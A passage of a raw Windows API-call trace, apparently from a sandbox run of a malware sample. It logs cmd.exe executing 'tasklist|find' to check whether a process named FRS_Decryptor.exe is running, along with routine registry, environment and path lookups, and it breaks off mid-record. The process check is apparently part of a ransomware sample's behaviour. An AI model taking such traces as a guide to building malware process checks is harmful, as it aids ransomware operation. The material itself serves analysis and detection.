lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x0, lpData=0xc8e7b4*=0xc, lpcbData=0xc8e7ac*=0x1000) returned 0x2 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x4, lpData=0xc8e7b4*=0x1, lpcbData=0xc8e7ac*=0x4) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x0, lpData=0xc8e7b4*=0x1, lpcbData=0xc8e7ac*=0x1000) returned 0x2 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x4, lpData=0xc8e7b4*=0x0, lpcbData=0xc8e7ac*=0x4) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x4, lpData=0xc8e7b4*=0x40, lpcbData=0xc8e7ac*=0x4) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x4, lpData=0xc8e7b4*=0x40, lpcbData=0xc8e7ac*=0x4) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x0, lpData=0xc8e7b4*=0x40, lpcbData=0xc8e7ac*=0x1000) returned 0x2 [0104.064] RegCloseKey (hKey=0x44) returned 0x0 [0104.064] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc8e7a8 | out: phkResult=0xc8e7a8*=0x44) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x0, lpData=0xc8e7b4*=0x40, lpcbData=0xc8e7ac*=0x1000) returned 0x2 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x4, lpData=0xc8e7b4*=0x1, lpcbData=0xc8e7ac*=0x4) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x0, lpData=0xc8e7b4*=0x1, lpcbData=0xc8e7ac*=0x1000) returned 0x2 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x4, lpData=0xc8e7b4*=0x0, lpcbData=0xc8e7ac*=0x4) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x4, lpData=0xc8e7b4*=0x9, lpcbData=0xc8e7ac*=0x4) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x4, lpData=0xc8e7b4*=0x9, lpcbData=0xc8e7ac*=0x4) returned 0x0 [0104.064] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc8e7b0, lpData=0xc8e7b4, lpcbData=0xc8e7ac*=0x1000 | out: lpType=0xc8e7b0*=0x0, lpData=0xc8e7b4*=0x9, lpcbData=0xc8e7ac*=0x1000) returned 0x2 [0104.064] RegCloseKey (hKey=0x44) returned 0x0 [0104.064] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50093 [0104.064] srand (_Seed=0x5aa50093) [0104.064] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0104.064] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0104.064] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0104.064] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe140c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0104.064] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0104.064] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.064] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0104.064] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0104.064] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0104.065] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0104.065] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0104.065] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0104.065] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0104.065] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0104.065] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0104.065] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0104.065] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0104.065] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc8f588 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0104.065] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xc8f588, lpFilePart=0xc8f584 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8f584*="Desktop") returned 0x1c [0104.065] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0104.065] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xc8f300 | out: lpFindFileData=0xc8f300) returned 0xe142d8 [0104.065] FindClose (in: hFindFile=0xe142d8 | out: hFindFile=0xe142d8) returned 1 [0104.065] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xc8f300 | out: lpFindFileData=0xc8f300) returned 0xe142d8 [0104.065] FindClose (in: hFindFile=0xe142d8 | out: hFindFile=0xe142d8) returned 1 [0104.065] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0104.065] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xc8f300 | out: lpFindFileData=0xc8f300) returned 0xe142d8 [0104.065] FindClose (in: hFindFile=0xe142d8 | out: hFindFile=0xe142d8) returned 1 [0104.065] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0104.065] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0104.065] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0104.066] GetEnvironmentStringsW () returned 0xe16190* [0104.066] FreeEnvironmentStringsA (penv="=") returned 1 [0104.066] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0104.066] GetConsoleOutputCP () returned 0x1b5 [0104.066] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0104.066] GetUserDefaultLCID () returned 0x409 [0104.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0104.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xc8f6b4, cchData=128 | out: lpLCData="0") returned 2 [0104.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xc8f6b4, cchData=128 | out: lpLCData="0") returned 2 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xc8f6b4, cchData=128 | out: lpLCData="1") returned 2 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0104.067] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0104.067] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0104.068] GetConsoleTitleW (in: lpConsoleTitle=0xe14e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0104.068] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0104.068] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0104.068] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0104.068] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0104.069] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0104.069] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0104.069] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0104.069] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0104.069] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0104.069] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0104.069] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0104.069] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0104.069] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0104.069] _wcsicmp (_String1="IF", _String2="find") returned 3 [0104.069] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0104.069] _wcsicmp (_String1="REM", _String2="find") returned 12 [0104.069] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0104.070] _pipe (in: _PtHandles=0xe151f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xe151f0) returned 0 [0104.070] _dup (_FileHandle=1) returned 5 [0104.070] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0104.070] _close (_FileHandle=4) returned 0 [0104.071] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0104.071] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0104.071] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0104.071] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0104.071] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0104.071] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0104.071] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0104.071] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0104.071] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0104.071] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0104.071] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0104.071] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0104.071] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0104.071] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0104.071] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0104.071] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0104.071] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0104.071] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0104.071] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0104.071] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0104.071] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0104.071] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0104.071] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0104.071] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0104.071] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0104.071] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0104.071] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0104.071] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0104.071] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0104.071] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0104.071] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0104.071] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0104.071] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0104.071] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0104.071] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0104.071] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0104.071] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0104.071] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0104.071] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0104.071] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0104.071] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0104.071] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0104.071] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0104.072] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0104.072] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0104.072] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0104.072] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0104.072] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0104.072] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0104.072] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0104.072] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0104.072] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0104.072] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0104.072] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0104.072] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0104.072] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0104.072] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0104.072] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0104.072] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0104.072] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0104.072] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0104.072] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0104.072] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0104.072] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0104.072] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0104.072] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0104.072] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0104.072] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0104.072] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0104.072] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0104.072] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0104.072] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0104.072] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0104.072] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0104.072] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0104.072] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0104.072] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0104.072] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0104.072] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0104.072] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0104.072] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0104.072] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0104.072] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0104.072] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0104.072] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0104.072] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0104.073] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0104.073] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0104.073] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0104.073] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0104.073] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0104.073] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0104.073] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0104.073] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0104.073] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0104.073] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0104.073] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0104.073] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0104.073] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0104.073] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0104.073] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0104.073] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0104.073] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0104.073] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0104.073] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0104.073] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0104.073] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0104.073] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0104.073] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0104.073] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0104.073] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0104.073] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0104.073] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0104.073] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0104.073] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0104.073] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0104.073] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0104.073] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0104.073] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0104.073] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0104.073] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0104.073] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0104.073] SetErrorMode (uMode=0x0) returned 0x0 [0104.073] SetErrorMode (uMode=0x1) returned 0x0 [0104.073] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe15228, lpFilePart=0xc8f514 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8f514*="Desktop") returned 0x1c [0104.073] SetErrorMode (uMode=0x0) returned 0x1 [0104.074] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0104.074] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.078] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.078] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xc8f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f2a0) returned 0xffffffff [0104.078] GetLastError () returned 0x2 [0104.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.079] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xc8f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f2a0) returned 0xe15530 [0104.079] FindClose (in: hFindFile=0xe15530 | out: hFindFile=0xe15530) returned 1 [0104.079] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xc8f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f2a0) returned 0xffffffff [0104.079] GetLastError () returned 0x2 [0104.079] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f2a0) returned 0xe15530 [0104.079] FindClose (in: hFindFile=0xe15530 | out: hFindFile=0xe15530) returned 1 [0104.079] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0104.079] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0104.079] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0104.079] SetErrorMode (uMode=0x0) returned 0x0 [0104.079] SetErrorMode (uMode=0x1) returned 0x0 [0104.079] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe1a3c0, lpFilePart=0xc8f2bc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8f2bc*="Desktop") returned 0x1c [0104.079] SetErrorMode (uMode=0x0) returned 0x1 [0104.079] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0104.079] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.079] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.080] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.080] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xc8f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f048) returned 0xffffffff [0104.080] GetLastError () returned 0x2 [0104.080] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.080] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xc8f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f048) returned 0xe15628 [0104.080] FindClose (in: hFindFile=0xe15628 | out: hFindFile=0xe15628) returned 1 [0104.080] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xc8f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f048) returned 0xffffffff [0104.080] GetLastError () returned 0x2 [0104.080] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f048) returned 0xe15628 [0104.080] FindClose (in: hFindFile=0xe15628 | out: hFindFile=0xe15628) returned 1 [0104.080] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0104.080] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0104.080] GetConsoleTitleW (in: lpConsoleTitle=0xc8f544, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0104.080] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8f470, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8f454 | out: lpAttributeList=0xc8f470, lpSize=0xc8f454) returned 1 [0104.080] UpdateProcThreadAttribute (in: lpAttributeList=0xc8f470, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8f45c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8f470, lpPreviousValue=0x0) returned 1 [0104.081] GetStartupInfoW (in: lpStartupInfo=0xc8f4a8 | out: lpStartupInfo=0xc8f4a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2b8, 